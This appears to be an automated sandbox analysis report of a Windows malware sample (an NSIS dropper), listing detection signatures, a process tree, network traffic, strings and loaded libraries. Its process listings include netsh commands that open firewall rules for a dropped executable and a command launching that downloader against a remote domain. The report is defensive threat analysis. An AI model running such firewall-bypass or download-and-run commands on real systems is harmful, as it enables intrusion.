Edit tour

Windows Analysis Report
KYagm8gq5S.exe

Overview

General Information

Sample name:	KYagm8gq5S.exe renamed because original name is a hash value
Original sample name:	59586c94ee121385d362a60382217b4e.exe
Analysis ID:	1581896
MD5:	59586c94ee121385d362a60382217b4e
SHA1:	816f6785f139eabe477a15023ccc7cff17790763
SHA256:	f27e3367788f7758120c63b9a725e7cb07998ce664b0571a56c8d0b8e05c1ec4
Tags:	exeuser-abuse_ch
Infos:

Detection

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Deletes itself after installation

Machine Learning detection for sample

Modifies the windows firewall

Uses netsh to modify the Windows network and firewall settings

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality for read data from the clipboard

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Classification

Process Tree

System is w10x64

KYagm8gq5S.exe (PID: 7264 cmdline: "C:\Users\user\Desktop\KYagm8gq5S.exe" MD5: 59586C94EE121385D362A60382217B4E)

netsh.exe (PID: 7288 cmdline: netsh advfirewall firewall add rule name=nggwslounqxvwf dir=in action=allow program="C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" enable=yes profile=public,private MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 7352 cmdline: netsh advfirewall firewall add rule name=nggwslounqxvwf dir=out action=allow program="C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" enable=yes profile=public,private MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

conhost.exe (PID: 7360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

nggwslounqxvwf.exe (PID: 7424 cmdline: "C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" "http://www.dantsteinfeld.click" "C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\1519" MD5: 71923BB5EDAFF27984A1A49095554A5F)

explorer.exe (PID: 7440 cmdline: C:\Windows\system32\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\PowerRun64.exe

ReversingLabs: Detection: 20%

Multi AV Scanner detection for submitted file

Source: KYagm8gq5S.exe

ReversingLabs: Detection: 42%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: KYagm8gq5S.exe

Joe Sandbox ML: detected

Source: KYagm8gq5S.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: KYagm8gq5S.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdbG source: SetACL64.exe.0.dr
Source:	Binary string: E:\clr\binaries\x86ret\bin\i386\VSSetup\Utils\boxstub.pdb source: dotNetFx45_Full_setup.exe.0.dr
Source:	Binary string: boxstub.pdb source: dotNetFx40_Full_setup.exe.0.dr
Source:	Binary string: D:\Download\Download\obj\Release\curl.pdb source: nggwslounqxvwf.exe, 00000005.00000000.1694869957.0000000000FD2000.00000002.00000001.01000000.00000005.sdmp, nggwslounqxvwf.exe.0.dr
Source:	Binary string: C:\Users\John\Downloads\calculator-winforms-app-main\BasicCalculator\obj\Release\BasicCalculator.pdb source: BasicCalculator1.exe.0.dr
Source:	Binary string: C:\Users\John\Downloads\calculator-winforms-app-main\BasicCalculator\obj\Release\BasicCalculator.pdb Q:Q ,Q_CorExeMainmscoree.dll source: BasicCalculator1.exe.0.dr
Source:	Binary string: C:\Users\John\Documents\Visual Studio 2022\Projects\App\App\obj\Release\WebView.pdb source: WebView.exe.0.dr
Source:	Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdb source: SetACL64.exe.0.dr

Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Code function: 0_2_00405C60 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C60
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Code function: 0_2_004068B1 FindFirstFileW,FindClose,	0_2_004068B1
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Code function: 0_2_00402930 FindFirstFileW,	0_2_00402930

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: www.dantsteinfeld.clickConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 23.106.59.18 23.106.59.18

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: www.dantsteinfeld.clickConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: www.dantsteinfeld.click

Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: PowerRun64.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: PowerRun64.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: PowerRun64.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: KYagm8gq5S.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: PowerRun64.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: PowerRun64.exe.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: PowerRun64.exe.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: nggwslounqxvwf.exe, 00000005.00000002.1725274847.00000000036C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ppp84k45ss7ehy8ypic5x.limelightcdn.com
Source: nggwslounqxvwf.exe, 00000005.00000002.1725274847.00000000036C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ppp84k45ss7ehy8ypic5x.limelightcdn.comd
Source: nggwslounqxvwf.exe, 00000005.00000002.1725274847.000000000369E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PowerRun64.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: nggwslounqxvwf.exe, 00000005.00000002.1724753354.00000000015F0000.00000004.00000020.00020000.00000000.sdmp, nggwslounqxvwf.exe, 00000005.00000002.1725274847.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, nggwslounqxvwf.exe, 00000005.00000002.1724753354.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.dantsteinfeld.click
Source: nggwslounqxvwf.exe, 00000005.00000002.1725274847.000000000369E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.dantsteinfeld.click/
Source: nggwslounqxvwf.exe, 00000005.00000002.1725274847.000000000369E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.dantsteinfeld.click/t
Source: nggwslounqxvwf.exe, 00000005.00000002.1724753354.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.dantsteinfeld.clickC:
Source: nggwslounqxvwf.exe, 00000005.00000002.1725274847.0000000003641000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.dantsteinfeld.clickT
Source: nggwslounqxvwf.exe, 00000005.00000002.1725274847.00000000036C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.dantsteinfeld.clickd
Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: WebView.exe.0.dr	String found in binary or memory: https://google.com
Source: SetACL64.exe.0.dr	String found in binary or memory: https://helgeklein.com
Source: SetACL64.exe.0.dr	String found in binary or memory: https://helgeklein.com.
Source: SetACL64.exe.0.dr	String found in binary or memory: https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe
Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: PowerRun64.exe.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: C:\Users\user\Desktop\KYagm8gq5S.exe

Code function: 0_2_00405718 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405718

Source: C:\Users\user\Desktop\KYagm8gq5S.exe

Code function: 0_2_0040352F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040352F

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\PowerRun64.exe 5F9DFD9557CF3CA96A4C7F190FC598C10F8871B1313112C9AEA45DC8443017A2

Source: WebView.exe.0.dr

Static PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"

Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameselfdel.dllJ vs KYagm8gq5S.exe
Source: KYagm8gq5S.exe, 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSetACL.exe. vs KYagm8gq5S.exe

Source: KYagm8gq5S.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal76.evad.winEXE@11/23@2/1

Source: C:\Users\user\Desktop\KYagm8gq5S.exe

0_2_0040352F

Source: C:\Users\user\Desktop\KYagm8gq5S.exe

Code function: 0_2_004049C4 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004049C4

Source: C:\Users\user\Desktop\KYagm8gq5S.exe

Code function: 0_2_004021CF CoCreateInstance,

0_2_004021CF

Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nggwslounqxvwf.exe.log

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7360:120:WilError_03

Source: C:\Users\user\Desktop\KYagm8gq5S.exe

File created: C:\Users\user\AppData\Local\Temp\nsiFE18.tmp

Jump to behavior

Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Process created: C:\Windows\SysWOW64\explorer.exe			Jump to behavior

Source: KYagm8gq5S.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\KYagm8gq5S.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\KYagm8gq5S.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: KYagm8gq5S.exe

ReversingLabs: Detection: 42%

Source: C:\Users\user\Desktop\KYagm8gq5S.exe

File read: C:\Users\user\Desktop\KYagm8gq5S.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\KYagm8gq5S.exe "C:\Users\user\Desktop\KYagm8gq5S.exe"
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=nggwslounqxvwf dir=in action=allow program="C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" enable=yes profile=public,private
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=nggwslounqxvwf dir=out action=allow program="C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" enable=yes profile=public,private
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Process created: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe "C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" "http://www.dantsteinfeld.click" "C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\1519"
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\system32\explorer.exe
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=nggwslounqxvwf dir=in action=allow program="C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" enable=yes profile=public,private	Jump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=nggwslounqxvwf dir=out action=allow program="C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" enable=yes profile=public,private	Jump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Process created: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe "C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" "http://www.dantsteinfeld.click" "C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\1519"	Jump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\system32\explorer.exe	Jump to behavior

Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll	Jump to behavior
